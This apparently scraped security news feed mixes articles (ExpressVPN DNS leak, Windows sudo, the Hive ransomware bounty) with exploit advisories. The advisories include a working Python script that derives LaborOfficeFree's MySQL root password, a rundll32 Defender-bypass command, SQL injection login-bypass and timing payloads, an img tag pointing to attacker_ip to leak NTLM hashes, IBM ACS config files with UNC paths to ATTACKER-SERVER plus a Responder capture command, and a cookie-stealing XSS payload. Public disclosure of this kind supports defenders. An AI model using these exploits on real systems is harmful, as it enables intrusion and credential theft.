By Waqas
Patch Your VPN! ExpressVPN Bug Leaks DNS Requests for Windows Users with Split Tunneling!
This is a post from HackRead.com Read the original post: ExpressVPN Bug Leaked DNS Requests for Windows Users

**Security researchers uncover a flaw in ExpressVPN’s Windows client, potentially exposing browsing activity for a small percentage of users.**

A recent discovery by security researchers revealed a worrying bug in **ExpressVPN**‘s Windows client, potentially leaking sensitive DNS requests outside the encrypted VPN tunnel.

This means that, under specific circumstances, websites visited by affected users could be visible to their internet service provider (ISP). While the actual content of online activity remains encrypted, the knowledge of visited websites can still be intrusive and compromise anonymity.

****Who Was Affected:****

The vulnerability only affected users who had the “split tunneling” feature enabled in their **ExpressVPN** client. This feature allows users to choose which applications bypass the VPN connection while others remain protected. The issue reportedly impacted roughly 1% of ExpressVPN’s Windows user base.

****Impact and Mitigation:****

While the leak did not expose the actual content of online activity, it could still reveal browsing habits and potentially be used for targeted advertising or tracking. Thankfully, ExpressVPN swiftly **addressed the issue** by releasing a patched version (12.73.0) in January 2024. Users with split tunneling enabled are strongly advised to update their clients immediately.

> _Versions 12.23.1–12.72.0 of our Windows app, published between May 19, 2022, and Feb. 7, 2024, had a bug that allowed some users’ DNS requests to go unprotected when split tunneling was activated. In these instances, the apps that were supposed to use the VPN might, under some circumstances, send DNS requests to third-party DNS servers instead of our servers._
> 
> ExpressVPN

****ExpressVPN’s Response:****

ExpressVPN acknowledged the bug and emphasized its commitment to user privacy. The company also **revealed** that the bug was discovered and reported by CNET’s Attila Tomaschek.

They released a detailed explanation of the issue and the fix implemented, along with instructions on how to update the client. They also clarified that the vast majority of their users were not affected.

****Lessons Learned:****

This incident highlights the importance of keeping software, particularly security software, up-to-date. It also reinforces the need for careful consideration when using features like split tunneling, as they can introduce potential vulnerabilities. Users should be aware of the trade-offs involved and prioritize their privacy needs when configuring their **VPN** settings.

**In Summary**

*   The bug was discovered and reported by CNET’s Attila Tomaschek.
*   This was not a full-blown data leak, only DNS requests leaked in specific situations.
*   The content of your online activity remained encrypted and protected.
*   The issue only affected certain versions of the ExpressVPN client on Windows.
*   The issue has been fixed and the vast majority of users were not affected.

1.  **How to Secure a Website by Monitoring DNS Records**
2.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
3.  **New VPN Malvertising Attack Drops OpcJacker Crypto Stealer**
4.  **Google Incognito Mode: New Disclaimer Reveals Data Tracking**
5.  **Free VPN Service SuperVPN Exposes 360 Million User Records**
6.  **Chinese VPN app Quickfox caught exposing 1 million users’ data**

ExpressVPN Bug Leaked DNS Requests for Windows Users

LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.

    # Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346# Google Dork: N/A# Date: 09/02/2023# Exploit Author: Peter Gabaldon - https://pgj11.com/# Vendor Homepage: https://www.laborofficefree.com/# Software Link: https://www.laborofficefree.com/#plans# Version: 19.10# Tested on: Windows 10# CVE : CVE-2024-1346# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable."""  After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).    Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.     Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.    00506548 | 53                       | push ebx                                | Aqui se hacen el XOR y demas que calcula la pwd :)    00506549 | 56                       | push esi                                |    0050654A | A3 7CFD8800              | mov dword ptr ds:[88FD7C],eax           | eax:"hola00331-20471-98465-AA370"    0050654F | 0FB7C2                   | movzx eax,dx                            | eax:"hola00331-20471-98465-AA370"    00506552 | 85C0                     | test eax,eax                            | eax:"hola00331-20471-98465-AA370"    00506554 | 7E 2E                    | jle laborofficefree.506584              |    00506556 | BA 01000000              | mov edx,1                               |    0050655B | 8B1D 7CFD8800            | mov ebx,dword ptr ds:[88FD7C]           |    00506561 | 0FB65C13 FF              | movzx ebx,byte ptr ds:[ebx+edx-1]       |    00506566 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506568 | 81E6 FF000000            | and esi,FF                              |    0050656E | 33DE                     | xor ebx,esi                             |    00506570 | 8B1C9D A40B8800          | mov ebx,dword ptr ds:[ebx*4+880BA4]     |    00506577 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506579 | C1EE 08                  | shr esi,8                               |    0050657C | 33DE                     | xor ebx,esi                             |    0050657E | 8919                     | mov dword ptr ds:[ecx],ebx              |    00506580 | 42                       | inc edx                                 |    00506581 | 48                       | dec eax                                 | eax:"hola00331-20471-98465-AA370"    00506582 | 75 D7                    | jne laborofficefree.50655B              |    00506584 | 5E                       | pop esi                                 |    00506585 | 5B                       | pop ebx                                 |    00506586 | C3                       | ret                                     |     The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.    005065C8 | F755 F8                  | not dword ptr ss:[ebp-8]                |  Running this script produces the root password of the LaborOfficeFree MySQL.    C:\Users\***\Desktop>python myLaborRootPwdCalculator.py    1591779762        C:\Users\***\Desktop>"""#! /usr/bin/python3from operator import xorimport ctypesif __name__ == "__main__":  magic_str = "hola00331-20471-98465-AA370"  mask = 0x000000ff  const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]  result = 0xffffffff  for c in magic_str:    aux = result & mask    aux2 = xor(ord(c), aux)    aux3 = xor(const[aux2], (result >> 8))    result = aux3  result = ~result  result = ctypes.c_long(result).value  print(result)

LaborOfficeFree 19.10 MySQL Root Password Calculator 

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message.Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.[References]https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt[Exploit/POC]Open command prompt as Administrator.C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)Access is denied.C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)Multi-commas, for the Win![Network Access]Local[Severity]High[Disclosure Timeline]February 7, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Windows Defender Detection Mitigation Bypass

Enpass Desktop Application version 6.9.2 suffers from an html injection vulnerability.

    ====================================================================HTML Injection in Enpass Desktop Application (Version 6.9.2)Product:            Enpass Password ManagerVersion:            6.9.2Issue date:        2024-02-11Download:         https://www.enpass.io/beta/Discovered by Muhammad Danial====================================================================*Overview:*A vulnerability has been discovered in the Enpass Desktop applicationversion 6.9.2 for Linux and Windows, which could potentially lead to HTMLinjection attacks. This vulnerability may be exploited by an attacker toexecute malicious code and leak NTLMv2 hashes, compromising the securityand privacy of affected users.*Vulnerability Details:*The vulnerability exists in the handling of notes within the Enpass Desktopapplication. By crafting a malicious note containing a specially craftedpayload such as <img src="http://attacker_ip/?c=" />, an attacker caninject arbitrary HTML code into the note. When the victim opens themalicious note shared by the attacker, the HTML injection payload isexecuted, allowing the attacker to capture the victim's NTLMv2 hashes andusername through their Enpass Desktop application.*Impact:*Successful exploitation of this vulnerability could result in the leakageof usernames and NTLMv2 hashes.

Enpass Desktop Application 6.9.2 HTML Injection

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Complaint Management System 2.0 SQL Injection

SCHLIX version 2.2.8-1 suffers from a REGEX processing denial of service vulnerability.

# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service  
# Date: 02/10/2024  
# Exploit Author: Diyar Saadi  
# Vendor Homepage: https://www.schlix.com  
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html  
# Version: v2.2.8-1  
# Tested on: Windows 11 + XAMPP

## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…

## Proof Of Concept ##

import requests  
import re  
import time

def test_redos(url, payload):  
try:  
vulnerable_regex = r'(.*a){x} for x > 10'

match = re.match(vulnerable_regex, payload)

if match:  
print("Vulnerability not triggered.")  
else:  
print("Vulnerability may be present. Simulating 30-second impact...")

for _ in range(6):  
time.sleep(5)  
print("Simulating impact...")

print("Simulated impact duration completed.")

except re.error:  
print("Error in regex pattern.")

try:  
response = requests.get(url)  
if response.status_code == 200:  
print("Service is up.")  
else:  
print("Service may be down or inaccessible.")  
except requests.RequestException as e:  
print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":  
target_url = 'http://localhost'

payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

test_redos(target_url, payload)

Sent with [Proton Mail](https://proton.me/) secure email.

SCHLIX 2.2.8-1 Denial Of Service

Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges.
"Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie said.
"It is an ergonomic and familiar solution for users who want to elevate a command

Operating System / Technology

Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges.

"Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie said.

"It is an ergonomic and familiar solution for users who want to elevate a command without having to first open a new elevated console."

Sudo, short for superuser do, is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, usually a user with elevated permissions (e.g., administrator).

The feature is available for Windows 11 builds 26045 and later. It can be enabled by heading to Settings > System > For Developers, and setting "Enable sudo" to On.

Sudo for Windows comes with three options: run applications in a new elevated console window, run the elevated process in the current window but with the input stream (stdin) closed, and in inline mode.

"The inline configuration option runs the elevated process in the current window and the process is able to receive input from the current console session," Redmond warns in its documentation.

"An unelevated process can send input to the elevated process within the same console windows or get information from the output in the current windows in this configuration."

Microsoft said it's also in the process of open-sourcing the project on GitHub, urging other users to contribute to the initiative as well as report issues and file feature requests.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Introduces Linux-Like 'sudo' Command to Windows 11

The U.S. Department of State has announced monetary rewards of up to $10 million for information about individuals holding key positions within the Hive ransomware operation.
It is also giving away an additional $5 million for specifics that could lead to the arrest and/or conviction of any person "conspiring to participate in or attempting to participate in Hive ransomware activity."

The U.S. Department of State has announced monetary rewards of up to $10 million for information about individuals holding key positions within the Hive ransomware operation.

It is also giving away an additional $5 million for specifics that could lead to the arrest and/or conviction of any person "conspiring to participate in or attempting to participate in Hive ransomware activity."

The multi-million-dollar rewards come a little over a year after a coordinated law enforcement effort covertly infiltrated and dismantled the darknet infrastructure associated with the Hive ransomware-as-a-service (RaaS) gang. One person with suspected ties to the group was arrested in Paris in December 2023.

Hive, which emerged in mid-2021, targeted more than 1,500 victims in over 80 countries, netting about $100 million in illegal revenues. In November 2023, Bitdefender revealed that a new ransomware group called Hunters International had acquired the source code and infrastructure from Hive to kick-start its own efforts.

There is some evidence to suggest that the threat actors associated with Hunters International are likely based in Nigeria, specifically an individual named Olowo Kehinde, per information gathered by Netenrich security researcher Rakesh Krishnan, although it could also be a fake persona adopted by the actors to cover up their true origins.

Blockchain analytics firm Chainalysis, in its 2023 review published last week, estimated that ransomware crews raked in $1.1 billion in extorted cryptocurrency payments from victims last year, compared to $567 million in 2022, all but confirming that ransomware rebounded in 2023 following a relative drop off in 2022.

"2023 marks a major comeback for ransomware, with record-breaking payments and a substantial increase in the scope and complexity of attacks — a significant reversal from the decline observed in 2022," it said.

The decline in ransomware activity in 2022 has been deemed a statistical aberration, with the downturn attributed to the Russo-Ukrainian war and the disruption of Hive. What's more, the total number of victims posted on data leak sites in 2023 was 4,496, up from 3,048 in 2021 and 2,670 in 2022.

Palo Alto Networks Unit 42, in its own analysis of ransomware gangs' public listings of victims on dark web sites, called out manufacturing as the most impacted industry vertical in 2023, followed by profession and legal services, high technology, retail, construction, and healthcare sectors.

While the law enforcement action prevented approximately $130 million in ransom payments to Hive, it's said that the takedown also "likely affected the broader activities of Hive affiliates, potentially lessening the number of additional attacks they could carry out." In total, the effort may have averted at least $210.4 million in payments.

Adding to the escalation in the regularity, scope, and volume of attacks, last year also witnessed a surge in new entrants and offshoots, a sign that the ransomware ecosystem is attracting a steady stream of new players who are attracted by the prospect of high profits and lower barriers to entry.

Cyber insurance provider Corvus said the number of active ransomware gangs registered a "significant" 34% increase between Q1 and Q4 2023, growing from 35 to 47 either due to fracturing and rebranding or other actors getting hold of leaked encryptors. Twenty-five new ransomware groups emerged in 2023.

"The frequency of rebranding, especially among actors behind the biggest and most notorious strains, is an important reminder that the ransomware ecosystem is smaller than the large number of strains would make it appear," Chainalysis said.

Besides a notable shift to big game hunting, which refers to the tactic of targeting very large companies to extract hefty ransoms, ransom payments are being steadily routed through cross-chain bridges, instant exchangers, and gambling services, indicating that e-crime groups are slowly moving away from centralized exchanges and mixers in pursuit of new avenues for money laundering.

In November 2023, the U.S. Treasury Department imposed sanctions against Sinbad, a virtual currency mixer that has been put to use by the North Korea-linked Lazarus Group to launder ill-gotten proceeds. Some of the other sanctioned mixers include Blender, Tornado Cash, and ChipMixer.

The pivot to big game hunting is also a consequence of companies increasingly refusing to settle, as the number of victims who chose to pay dropped to a new low of 29% in the last quarter of 2023, according to data from Coveware.

"Another factor contributing to higher ransomware numbers in 2023 was a major shift in threat actors' use of vulnerabilities," Corvus said, highlighting Cl0p's exploitation of flaws in Fortra GoAnywhere and Progress MOVEit Transfer.

"If malware, like infostealers, provide a steady drip of new ransomware victims, then a major vulnerability is like turning on a faucet. With some vulnerabilities, relatively easy access to thousands of victims can materialize seemingly overnight."

Cybersecurity company Recorded Future revealed that ransomware groups' weaponization of security vulnerabilities falls into two clear categories: vulnerabilities that have only been exploited by one or two groups and those that have been widely exploited by multiple threat actors.

"Magniber has uniquely focused on Microsoft vulnerabilities, with half of its unique exploits focusing on Windows Smart Screen," it noted. "Cl0p has uniquely and infamously focused on file transfer software from Accellion, SolarWinds, and MOVEit. ALPHV has uniquely focused on data backup software from Veritas and Veeam. REvil has uniquely focused on server software from Oracle, Atlassian, and Kaseya."

The continuous adaptation observed among cybercrime crews is also evidenced in the uptick in DarkGate and PikaBot infections following the takedown of the QakBot malware network, which has been the preferred initial entry pathway into target networks for ransomware deployment.

"Ransomware groups such as Cl0p have used zero-day exploits against newly discovered critical vulnerabilities, which represent a complex challenge for potential victims," Unit 42 said.

"While ransomware leak site data can provide valuable insight on the threat landscape, this data might not accurately reflect the full impact of a vulnerability. Organizations must not only be vigilant about known vulnerabilities, but they must also develop strategies to quickly respond to and mitigate the impact of zero-day exploits."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Offers $10 Million Bounty for Info Leading to Arrest of Hive Ransomware Leaders

IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Advanced Page Visit Counter version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-SiteScripting (XSS) (Authenticated)# Date: 11.10.2023# Exploit Author: Furkan ÖZER# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/# Version: 8.0.5# Tested on: Kali-Linux,Windows10,Windows 11# CVE: N/A# Description:Advanced Page Visit Counter is a remarkable Google Analytics alternativespecifically designed for WordPress websites, and it has quickly become amust-have plugin for website owners and administrators seeking powerfultracking and analytical capabilities. With the recent addition of EnhancedeCommerce Tracking for WooCommerce, this plugin has become even moreindispensable for online store owners.Homepage | Support | Premium VersionIf you’re in search of a GDPR-friendly website analytics plugin exclusivelydesigned for WordPress, look no further than Advanced Page Visit Counter.This exceptional plugin offers a compelling alternative to Google Analyticsand is definitely worth a try for those seeking enhanced data privacycompliance.This is a free plugin and doesn’t require you to create an account onanother site. All features outlined below are included in the free plugin.Description of the owner of the plugin Stored Cross-Site Scripting attackagainst the administrators or the other authenticated users.The plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)The details of the discovery are given below.# Steps To Reproduce:1. Install and activate the Advanced Page Visit Counter plugin.2. Visit the "Settings" interface available in settings page of the pluginthat is named "Widget Settings"3. In the plugin's "Today's Count Label" setting field, enter the payloadPayload: " "type=image src=1 onerror=alert(document.cookie)> "6. Click the "Save Changes" button.7. The XSS will be triggered on the settings page when every visit of anauthenticated user.# Video Linkhttps://youtu.be/zcfciGZLriM

Tag

#windows